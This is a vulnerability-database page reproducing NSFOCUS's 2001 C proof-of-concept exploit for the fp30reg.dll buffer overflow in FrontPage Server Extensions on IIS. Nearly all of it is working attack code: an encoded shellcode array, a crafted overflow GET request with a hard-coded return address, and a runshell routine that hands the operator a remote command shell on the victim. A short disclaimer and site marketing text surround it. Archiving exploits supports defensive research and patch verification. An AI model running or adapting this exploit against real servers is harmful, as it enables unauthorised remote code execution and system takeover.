Vulners
Lucene search
Microsoft Visual Studio RAD Support - Remote Buffer Overflow
🗓️ 21 Jun 2001 00:00:00Reported by NSFOCUS Security TeamType 
exploitdb🔗 www.exploit-db.com👁 17 Views
// source: https://www.securityfocus.com/bid/2906/info
Due to an unchecked buffer in a subcomponent of FrontPage Server Extensions (Visual InterDev RAD Remote Deployment Support), a specially crafted request via 'fp30reg.dll' could allow a user to execute arbitrary commands in the context of IWAM_machinename on a host running IIS 5.0. A host running IIS 4.0, could allow the execution of arbitrary commands in the SYSTEM context.
/*
* fpse2000ex.c - Proof of concept code for fp30reg.dll overflow bug.
* Copyright (c) 2001 - Nsfocus.com
*
* DISCLAIMS:
* This is a proof of concept code. This code is for test purpose
* only and should not be run against any host without permission from
* the system administrator.
*
* NSFOCUS Security Team <[email protected]>
* http://www.nsfocus.com
*/
#include <stdio.h>
#include <sys/time.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#include <signal.h>
#include <unistd.h>
#include <errno.h>
/* fat shellcode ;) */
char shellcode[] =
"\xeb\x1a\x5f\x56\x56\x57\x5e\x33\xc9\xac\x3a\xc1\x74\x13\x3c\x30\x74\x5\x34"
"\xaa\xaa\xeb\xf2\xac\x2c\x40\xeb\xf6\xe8\xe1\xff\xff\xff\xff\x21\x46\x2b\x46"
"\xb6\xa3\xaa\xaa\xf9\xfc\xfd\x27\x17\x4e\x5c\x55\x55\x13\xed\xa8\xaa\xaa\x12"
"\x66\x66\x66\x66\x59\x1\x6d\x2f\x66\x5d\x55\x55\xaa\xaa\xaa\xaa\x21\xef\xa2"
"\x21\x22\x2e\xaa\xaa\xaa\x23\x27\x62\x5d\x55\x55\x21\xff\xa2\x21\x28\x22\xaa"
"\xaa\xaa\x23\x2f\x6e\x5d\x55\x55\x21\xe7\xa2\x21\xfb\xa2\x23\x3f\x6a\x5d\x55"
"\x55\x43\x61\xaf\xaa\xaa\x25\x2f\x16\x5d\x55\x55\x27\x17\x5a\x5d\x55\x55\xce"
"\xb\xaa\xaa\xaa\xaa\x23\xed\xa2\xce\x23\x97\xaa\xaa\xaa\xaa\x6d\x2f\x5a\x5d"
"\x55\x55\x55\x55\x55\x55\x21\x2f\x16\x5d\x55\x55\x29\x42\xad\x23\x2f\x5e\x5d"
"\x55\x55\x6d\x2f\x12\x5d\x55\x55\xaa\xaa\x4a\xdd\x42\xcd\xaf\xaa\xaa\x29\x17"
"\x66\x5d\x55\x55\xaa\xa5\x2f\x77\xab\xaa\xaa\x21\x27\x12\x5d\x55\x55\x2b\x6b"
"\xaa\xaa\xab\xaa\x23\x27\x12\x5d\x55\x55\x2b\x17\x12\x5d\x55\x55\xaa\xaa\xaa"
"\xd2\xdf\xa0\x6d\x2f\x12\x5d\x55\x55\xaa\xaa\x5a\x15\x21\x3f\x12\x5d\x55\x55"
"\x99\x6a\xcc\x21\xa8\x97\xe7\xf0\xaa\xaa\xa5\x2f\x30\x70\xab\xaa\xaa\x21\x27"
"\x12\x5d\x55\x55\x21\xfb\x96\x21\x2f\x12\x5d\x55\x55\x99\x63\xcc\x21\xa6\xba"
"\x2b\x53\xfa\xef\xaa\xaa\xa5\x2f\xd3\xab\xaa\xaa\x21\x3f\x12\x5d\x55\x55\x21"
"\xe8\x96\x21\x27\x12\x5d\x55\x55\x21\xfe\xab\xd2\xa9\x3f\x12\x5d\x55\x55\x23"
"\x3f\x1e\x5d\x55\x55\x21\x2f\x1e\x5d\x55\x55\x21\xe2\xa6\xa9\x27\x12\x5d\x55"
"\x55\x23\x27\x6\x5d\x55\x55\x21\x3f\x6\x5d\x55\x55\x2b\x90\xe1\xef\xf8\xe4\xa5"
"\x2f\x99\xab\xaa\xaa\x21\x2f\x6\x5d\x55\x55\x2b\xd2\xae\xef\xe6\x99\x98\xa5"
"\x2f\x8a\xab\xaa\xaa\x21\x27\x12\x5d\x55\x55\x23\x27\xe\x5d\x55\x55\x21\x3f"
"\x1e\x5d\x55\x55\x21\x2f\x12\x5d\x55\x55\xa9\xe8\x8a\x23\x2f\x6\x5d\x55\x55"
"\x6d\x2f\x2\x5d\x55\x55\xaa\xaa\xaa\xaa\x41\xb4\x21\x27\x2\x5d\x55\x55\x29\x6b"
"\xab\x23\x27\x2\x5d\x55\x55\x21\x3f\x6\x5d\x55\x55\x29\x68\xae\x23\x3f\x6\x5d"
"\x55\x55\x21\x2f\x1e\x5d\x55\x55\x21\x27\x2\x5d\x55\x55\x91\xe2\xb2\xa5\x27"
"\x6a\xaa\xaa\xaa\x21\x3f\x6\x5d\x55\x55\x21\xa8\x21\x27\x12\x5d\x55\x55\x2b"
"\x96\xab\xed\xcf\xde\xfa\xa5\x2f\xa\xaa\xaa\xaa\x21\x3f\x6\x5d\x55\x55\x21\xa8"
"\x21\x27\x12\x5d\x55\x55\x2b\xd6\xab\xae\xd8\xc5\xc9\xeb\xa5\x2f\x2e\xaa\xaa"
"\xaa\x21\x3f\x2\x5d\x55\x55\xa9\x3f\x2\x5d\x55\x55\xa9\x3f\x12\x5d\x55\x55"
"\x21\x2f\x1e\x5d\x55\x55\x21\xe2\x8e\x99\x6a\xcc\x21\xae\xa0\x23\x2f\x6\x5d"
"\x55\x55\x21\x27\x1e\x5d\x55\x55\x21\xfb\xba\x21\x2f\x6\x5d\x55\x55\x27\xe6"
"\xba\x55\x23\x27\x6\x5d\x55\x55\x21\x3f\x6\x5d\x55\x55\xa9\x3f\x6\x5d\x55\x55"
"\xa9\x3f\x6\x5d\x55\x55\xa9\x3f\x6\x5d\x55\x55\xa9\x3f\x12\x5d\x55\x55\x21\x2f"
"\x1e\x5d\x55\x55\x21\xe2\xb6\x21\xbe\xa0\x23\x3f\x6\x5d\x55\x55\x21\x2f\x6\x5d"
"\x55\x55\xa9\x2f\x12\x5d\x55\x55\x23\x2f\x66\x5d\x55\x55\x41\xaf\x43\xa7\x55"
"\x55\x55\x43\xbc\x54\x55\x55\x27\x17\x5a\x5d\x55\x55\x21\xed\xa2\xce\x9\xaa"
"\xaa\xaa\xaa\x29\x17\x66\x5d\x55\x55\xaa\xdf\xaf\x43\xf4\xa9\xaa\xaa\x6d\x2f"
"\x6\x5d\x55\x55\xab\xaa\xaa\xaa\x41\xa5\x21\x27\x6\x5d\x55\x55\x29\x6b\xab\x23"
"\x27\x6\x5d\x55\x55\x29\x17\x6\x5d\x55\x55\xa2\xd7\xc4\x21\x5e\x21\x3f\x16"
"\x5d\x55\x55\xf8\x21\x2f\xe\x5d\x55\x55\xfa\x55\x3f\x66\x5d\x55\x55\x91\x5e"
"\x3a\xe9\xe1\xe9\xe1\x21\x27\x6\x5d\x55\x55\x23\x2e\x27\x7a\x5d\x55\x55\x41"
"\xa5\x21\x3f\x16\x5d\x55\x55\x29\x68\xab\x23\x3f\x16\x5d\x55\x55\x21\x2f\x16"
"\x5d\x55\x55\xa5\x14\xa2\x2f\x63\xdf\xba\x21\x3f\x16\x5d\x55\x55\xa5\x14\xe8"
"\xab\x2f\x6a\xde\xa8\x41\xa8\x41\x78\x21\x27\x16\x5d\x55\x55\x29\x6b\xab\x23"
"\x27\x16\x5d\x55\x55\x43\xd0\x55\x55\x55\x6d\x2f\x8e\x5d\x55\x55\xa6\xaa\xaa"
"\xaa\x6d\x2f\x82\x5d\x55\x55\xaa\xaa\xaa\xaa\x6d\x2f\x86\x5d\x55\x55\xab\xaa"
"\xaa\xaa\x21\x5e\xc0\xaa\x27\x3f\x8e\x5d\x55\x55\xf8\x27\x2f\xe2\x5d\x55\x55"
"\xfa\x27\x27\xe6\x5d\x55\x55\xfb\x55\x3f\x7e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1"
"\xe9\xe1\x21\x5e\xc0\xaa\x27\x3f\x8e\x5d\x55\x55\xf8\x27\x2f\xea\x5d\x55\x55"
"\xfa\x27\x27\xee\x5d\x55\x55\xfb\x55\x3f\x7e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1"
"\xe9\xe1\x27\x17\xca\x5d\x55\x55\x99\x6a\x13\xbb\xaa\xaa\xaa\x58\x1\x6d\x2f"
"\x26\x5d\x55\x55\xab\xab\xaa\xaa\xcc\x6d\x2f\x3a\x5d\x55\x55\xaa\xaa\x21\x3f"
"\xee\x5d\x55\x55\x23\x3f\x32\x5d\x55\x55\x21\x2f\xe2\x5d\x55\x55\x23\x2f\x36"
"\x5d\x55\x55\x21\x27\xe2\x5d\x55\x55\x23\x27\xa\x5d\x55\x55\x6d\x2f\x6\x5d\x55"
"\x55\xaa\xaa\xaa\xaa\x21\x5e\x27\x3f\xfa\x5d\x55\x55\xf8\x27\x2f\xca\x5d\x55"
"\x55\xfa\xc0\xaa\xc0\xaa\xc0\xaa\xc0\xab\xc0\xaa\xc0\xaa\x21\x27\x16\x5d\x55"
"\x55\xfb\xc0\xaa\x55\x3f\x72\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x23\x2f"
"\x6\x5d\x55\x55\x21\x3f\x16\x5d\x55\x55\x29\x68\xa2\x23\x3f\x16\x5d\x55\x55"
"\x21\x5e\xc0\xaa\xc0\xaa\x27\x2f\x96\x5d\x55\x55\xfa\xc2\xaa\xa2\xaa\xaa\x27"
"\x27\x56\x5d\x55\x55\xfb\x21\x3f\xe6\x5d\x55\x55\xf8\x55\x3f\x4a\x5d\x55\x55"
"\x91\x5e\x3a\xe9\xe1\xe9\xe1\x6d\x2f\x6\x5d\x55\x55\xa2\xaa\xaa\xaa\x21\x5e"
"\xc0\xaa\x27\x2f\x6\x5d\x55\x55\xfa\x21\x27\x16\x5d\x55\x55\x29\x6b\xa3\xfb"
"\x21\x3f\x6a\x5d\x55\x55\xf8\x55\x3f\x62\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9"
"\xe1\x12\xab\xaa\xaa\xaa\x2f\x6a\xa5\x2e\xf4\xab\xaa\xaa\x21\x5e\xc0\xaa\xc0"
"\xaa\x27\x27\x96\x5d\x55\x55\xfb\xc2\xaa\xa2\xaa\xaa\x27\x3f\x56\x5d\x55\x55"
"\xf8\x21\x2f\xe6\x5d\x55\x55\xfa\x55\x3f\x4a\x5d\x55\x55\x91\x5e\x3a\xe9\xe1"
"\xe9\xe1\x29\x17\x96\x5d\x55\x55\xaa\xd4\xcb\x21\x5e\xc0\xaa\x27\x27\x96\x5d"
"\x55\x55\xfb\x21\x3f\x96\x5d\x55\x55\xf8\x27\x2f\x56\x5d\x55\x55\xfa\x21\x27"
"\xe6\x5d\x55\x55\xfb\x55\x3f\x4e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x29"
"\x17\x96\x5d\x55\x55\xaa\xd4\x8c\x21\x5e\xc0\xaa\x27\x3f\x96\x5d\x55\x55\xf8"
"\x27\x2f\x56\x5d\x55\x55\xfa\x21\x27\x6a\x5d\x55\x55\xfb\x55\x3f\x62\x5d\x55"
"\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x43\x68\xaa\xaa\xaa\x6d\x2f\x96\x5d\x55\x55"
"\xaa\xa2\xaa\xaa\x21\x5e\x27\x3f\x96\x5d\x55\x55\xf8\x27\x2f\x56\x5d\x55\x55"
"\xfa\x21\x27\x6a\x5d\x55\x55\xfb\x55\x3f\x6e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1"
"\xe9\xe1\x23\x2f\x6\x5d\x55\x55\x29\x17\x6\x5d\x55\x55\xab\xde\xf2\x6d\x2f\x6"
"\x5d\x55\x55\xa2\xaa\xaa\xaa\x21\x5e\xc0\xaa\x27\x3f\x6\x5d\x55\x55\xf8\x21"
"\x2f\x6\x5d\x55\x55\xfa\x21\x27\x16\x5d\x55\x55\xfb\x21\x3f\xea\x5d\x55\x55"
"\xf8\x55\x3f\x42\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x12\xab\xaa\xaa\xaa"
"\x2f\x6a\xde\xbc\x21\x5e\xc2\x55\x55\x55\xd5\x55\x3f\x46\x5d\x55\x55\x91\x5e"
"\x3a\xe9\xe1\xe9\xe1\x41\x4b\x41\x87\x21\x5e\xc0\xaa\x27\x27\x96\x5d\x55\x55"
"\xfb\x21\x3f\x96\x5d\x55\x55\xf8\x27\x2f\x56\x5d\x55\x55\xfa\x21\x27\xea\x5d"
"\x55\x55\xfb\x55\x3f\x42\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x43\x3f\x54"
"\x55\x55\x41\x54\xf2\xfa\x21\x17\x16\x5d\x55\x55\x23\xed\x58\x69\x21\xee\x8e"
"\xa6\xaf\x12\xaa\xaa\xaa\x6d\xaa\xee\x99\x88\xbb\x99\x6a\x69\x41\x46\x42\x9a"
"\x50\x55\x55\xe9\xd8\xcf\xcb\xde\xcf\xfa\xc3\xda\xcf\xaa\xe9\xd8\xcf\xcb\xde"
"\xcf\xfa\xd8\xc5\xc9\xcf\xd9\xd9\xeb\xaa\xe9\xc6\xc5\xd9\xcf\xe2\xcb\xc4\xce"
"\xc6\xcf\xaa\xfa\xcf\xcf\xc1\xe4\xcb\xc7\xcf\xce\xfa\xc3\xda\xcf\xaa\xf8\xcf"
"\xcb\xce\xec\xc3\xc6\xcf\xaa\xfd\xd8\xc3\xde\xcf\xec\xc3\xc6\xcf\xaa\xf9\xc6"
"\xcf\xcf\xda\xaa\xaa\xc9\xc7\xce\x84\xcf\xd2\xcf\xaa\xa7\xa0\xcf\xd2\xc3\xde"
"\xa7\xa0\xaa\xf2\xe5\xf8\xee\xeb\xfe\xeb\xaa";
int
resolv (char *host, long *ip)
{
struct hostent *hp;
if ((*ip = inet_addr (host))<0)
{
if ((hp = gethostbyname (host)) == NULL)
{
fprintf (stderr, "%s: unknown host\n", host);
exit (-1);
}
*ip = *(unsigned long *) hp->h_addr;
}
return 0;
}
int
connect_to (char *hostname, short port)
{
struct sockaddr_in sa;
int s;
s = socket (AF_INET, SOCK_STREAM, 0);
resolv (hostname, (long *) &sa.sin_addr.s_addr);
sa.sin_family = AF_INET;
sa.sin_port = htons (port);
if (connect (s, (struct sockaddr *) &sa, sizeof (sa)) == -1)
{
perror("connect");
exit(-1);
}
return s;
}
void
runshell (int sockd)
{
char buff[1024];
int ret;
fd_set fds;
printf("\nPress CTRL_C to exit the shell!\n");
for (;;)
{
FD_ZERO (&fds);
FD_SET (0, &fds);
FD_SET (sockd, &fds);
if (select (sockd + 1, &fds, NULL, NULL, NULL) < 0)
{
exit (-1);
}
if (FD_ISSET (sockd, &fds))
{
bzero (buff, sizeof buff);
if ((ret=read(sockd,buff,sizeof(buff)))<1)
{
fprintf (stderr, "Connection closed\n");
exit (-1);
}
write(1,buff,ret);
}
if (FD_ISSET (0, &fds))
{
bzero (buff, sizeof buff);
ret=read(0,buff,sizeof(buff));
write(sockd,buff,ret);
}
}
}
main (int argc, char **argv)
{
char overbuff[400];
char buff[4096];
/* If system has the unicode bug, it is possible to attack fp4areg.dll */
/* char fppath[] = "/_vti_bin/..%c1%9cbin/fp4areg.dll"; */
char fppath[] = "/_vti_bin/_vti_aut/fp30reg.dll";
char server[] = "www.blahblah.com";
char retaddress[] = "\x62\x18\xd5\x67";
char jmpshell[] = "\xff\x66\x78";
int i, sockfd;
int port = 80;
if (argc < 2)
{
printf ("Proof of concept code for fp30reg.dll overflow bug by NSFOCUS Security Team\n\n");
printf ("Usage: %s victim [port]\n", argv[0]);
exit (-1);
}
if (argc > 2) port = atoi (argv[2]);
sockfd = connect_to (argv[1], port);
bzero (overbuff, sizeof (overbuff));
bzero (buff, sizeof (buff));
memset (overbuff, 'a', 258);
memcpy (overbuff, jmpshell, strlen (jmpshell));
strcpy (overbuff + 258, "%c");
for (i = 0; i < 0x50; i += 4)
strncat (overbuff, retaddress, 4);
strcat (overbuff, "aaa");
sprintf (buff,
"GET %s?%s HTTP/1.1 \nHOST:%s\r\nContent-Type: \
text/html\nContent-Length:%d\r\nProxy_Connection: Keep-Alive\r\n\r\n%s",
fppath, overbuff, server, strlen (shellcode), shellcode);
printf ("buff len = %d\n", strlen (buff));
write (sockfd, buff, strlen (buff));
printf ("payload sent!\n");
if(read (sockfd, buff, strlen(buff))<0)
{
printf("EOF\n");
exit(-1);
}
else
{
if(memcmp(buff,"XORDATA",8)==0)
{
printf("exploit succeed\n");
/* Press Enter key to get the command prompt */
runshell (sockfd);
}
else
{
printf("exploit failed\n");
close(sockfd);
exit(-1);
}
}
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
21 Jun 2001 00:00Current
7.4High risk
Vulners AI Score7.4